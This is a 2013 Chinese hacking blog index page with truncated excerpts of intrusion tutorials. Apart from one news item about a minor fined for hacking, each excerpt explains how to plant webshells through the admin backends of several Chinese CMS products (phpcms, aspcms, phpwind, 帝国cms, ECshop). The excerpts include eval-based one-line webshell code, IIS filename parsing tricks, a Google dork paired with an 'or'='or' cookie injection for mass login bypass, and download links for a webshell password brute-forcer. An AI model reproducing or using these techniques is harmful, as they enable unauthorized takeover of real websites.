• 未成年“黑客”非法入侵部门官网被处罚5000元

    未成年“黑客”非法入侵部门官网被处罚5000元
                 11月25日上午,安徽省首例未成年人非法控制计算机信息系统案件一审宣判,淮南市田家庵区人民法院认定被告人荣某(未成年人)、刘某(已成年)行为已构成非法控制计算机信息系统罪,分别被判处罚金5000元。              荣某系浙江省嘉兴市秀水职业技术学院学生,2012年3、4月份,其从网友处获取了文件名为”wbgz.txt”的文档,其中包含有淮南市地震...阅读全文
    作者:qxz_xp | 发布:2013年11月25日 | 分类:业界新闻, 黑客攻防 | 暂无评论
    阅读全文

  • FCK突破建立文件夹后台拿shell

    FCK突破建立文件夹后台拿shell
             今天准备搞一个站,在此站搞了一翻后发现此站没有找到可利用的漏洞,此时就有点感觉蛋疼了,所以就想找个旁站来提权,扫描了一下旁站 我靠没有几个站点,后来在经过一翻努力下,终于还是登录进了一个站的后台,在后台瞧了一会,发现是FCK编辑器,哈 有点希望了,马上想到用FCK的突破建立文件夹的漏洞试下。下面就写下FCK突破建立文件夹后台拿shell方法,这个百度里...阅读全文
    作者:qxz_xp | 发布:2013年11月18日 | 分类:菜鸟入门, 黑客技术, 黑客攻防 | 1条评论
    阅读全文

  • 记一次phpcms v9后台拿shell过程

    记一次phpcms v9后台拿shell过程
    记一次phpcms v9后台拿shell过程 登录进入后台管理后,点击界面,模板风格,然后点击祥细列表,如下图: 然后点击 search 这个文件夹,如下图: 然后点击修改 index.html 文件 然后把以下代码复制上去提交。 <? $fp = @fopen(“qxz.php”, ‘a’); @fwrite($fp, ‘<‘.’?php’.”\r\n\r\n”.’eval($_POST...阅读全文
    作者:qxz_xp | 发布:2013年11月17日 | 分类:菜鸟入门, 黑客技术, 黑客攻防 | 3条评论
    阅读全文

  • aspcms后台拿shell的两种方法

    aspcms后台拿shell的两种方法
    aspcms后台拿shell的两种方法: 第一种:点击“界面风格”,然后选“编辑模板/CSS文件”,然后“添加模板”,文件名称写qxz.asp;.html, 在文件内容写一句话 <%eval request(“qxz”)%> 然后点击添加,会提示添加成功,然后在模板列表中就可以找到我们添加的一句话:qxz.asp;.html 点这个文件就会弹出插入一句话的页面,OK然后菜刀连接。 第二种:前台留言插入一句话,这个要...阅读全文
    作者:qxz_xp | 发布:2013年11月04日 | 分类:菜鸟入门, 黑客攻防 | 暂无评论
    阅读全文

  • 良精南方后台简单拿shell

    良精南方后台简单拿shell
    首先必须要先登入管理后台。 进入后台管理后,在网站地址后面加上 admin/southidceditor/admin_style.asp  这是良精南方的远程编辑器路径。 如:http://www.xxx.com/admin/southidceditor/admin_style.asp  OK是不是看到了我们大家比较熟悉的ewebeditor编辑器界面了。 然后后面就不用多说了吧,随便找一个样式在图片那里加上 asp 点击预览,上传大马,如点击上传图片没有...阅读全文
    作者:qxz_xp | 发布:2013年11月02日 | 分类:菜鸟入门, 黑客技术, 黑客攻防 | 6条评论
    阅读全文

  • phpwind后台getshell方法

    phpwind后台getshell方法
    在phpwind后台上传插件处,可以上传一个包含php木马的phpwind标准格式插件安装包,并可getshell. 一、先制作一个安装包,需要包含一个manifest.xml文件和一个php一句话(此处文件名为php.php)。 manifest.xml代码如下: <?xml version="1.0" encoding="gbk"?> <manifest> <application> <name>getshell</name> <alias>getshell</...阅读全文
    作者:qxz_xp | 发布:2013年11月01日 | 分类:菜鸟入门, 黑客技术, 黑客攻防 | 暂无评论
    阅读全文

  • 利用关键字后台批量拿shell

    利用关键字后台批量拿shell
    google:关键字:inurl:szwyadmin/login.asp 打开任意一个搜索结果,打开后台登录界面后,在地址栏中全部替换成下面代码: javascript:alert(document.cookie=”adminuser=”+escape(“‘or’=’or'”));javascript:alert(document.cookie=”adminpass=”+escape(“‘or’=’or'”));javascript:aler...阅读全文
    作者:qxz_xp | 发布:2013年10月22日 | 分类:黑客技术, 黑客攻防 | 2条评论
    阅读全文

  • 入侵网站时用到的十种小方法

    入侵网站时用到的十种小方法
    1.例如我们的目标网址为“http://www.xxxx.cn/forum/index.php”那么我们把地址改为http://www.xxxx.cn/forum/index.PHP后再浏览看看是否存在页面,如果存在的话,则服务器所使用的系统为windows,如果显示不存在,则服务器很有可能使用的是*nix系统。   2. Ewebeditor编辑器拿站的新方法 Ewebeditor编辑器 大家应该是再熟悉不过的吧?我们找到后台登录的地方后,先用默认...阅读全文
    作者:qxz_xp | 发布:2013年10月18日 | 分类:菜鸟入门, 黑客攻防 | 暂无评论
    阅读全文

  • ECshop商城系统后台拿webshell方法

    ECshop商城系统后台拿webshell方法
    之前,网上爆出了ecshop最新的0day .论坛里也有人直接给出了EXP 相信好多基友都拿了不少的站吧. 这几天正好有个朋友要我帮忙拿一个站 看了一下,ecshop的  直接用exp 爆出了用户名和密码.. 接下来 就该拿shell了 在网上搜了一下, 看到了不少拿shell的方法 都试了一下,但是没有一个成功的  应该是都补上了. 群里一朋友 给介绍了一个思路 试了一下  竟然成功了 不多说了   ...阅读全文
    作者:qxz_xp | 发布:2013年10月17日 | 分类:黑客技术, 黑客攻防 | 暂无评论
    阅读全文

  • 帝国cms后台拿shell两种方法

    帝国cms后台拿shell两种方法
    第一种方法:  增加自定义页面 (6.0上实验成功) 模板管理–>增加自定义页面–>页面名称随便–>文件名:x.asp;.html–>页面内容–>小马内容复制进去 保存后再管理页面单击就可以进去看到你的马了,一般在网站根目录下面。 第二种方法: 导入新型模块(6.0上实验不成功) “还是几个月前一个朋友让我看看帝国进后台能不能找到简单点...阅读全文
    作者:qxz_xp | 发布:2013年10月07日 | 分类:黑客技术, 黑客攻防 | 暂无评论
    阅读全文

  • WebShell密码爆力破解工具V10

    WebShell密码爆力破解工具V10
    工具简介: WebShell密码爆力破解工具V10是一款可以破解别的黑客留在网站里面的木马后门密码工具。 WebShell密码爆力破解工具V10.支持asp/aspx/php/jsp webshell  可自定义爆破成功特征。 破解速度的快慢和你的vpn速度还有服务器速度有关! 下载地址:http://pan.baidu.com/s/1mYXoc    提取密码:j84a 字典下载:http://pan.baidu.com/s/1f2bN4 阅读全文
    作者:qxz_xp | 发布:2013年9月30日 | 分类:黑客工具, 黑客攻防 | 1条评论
    阅读全文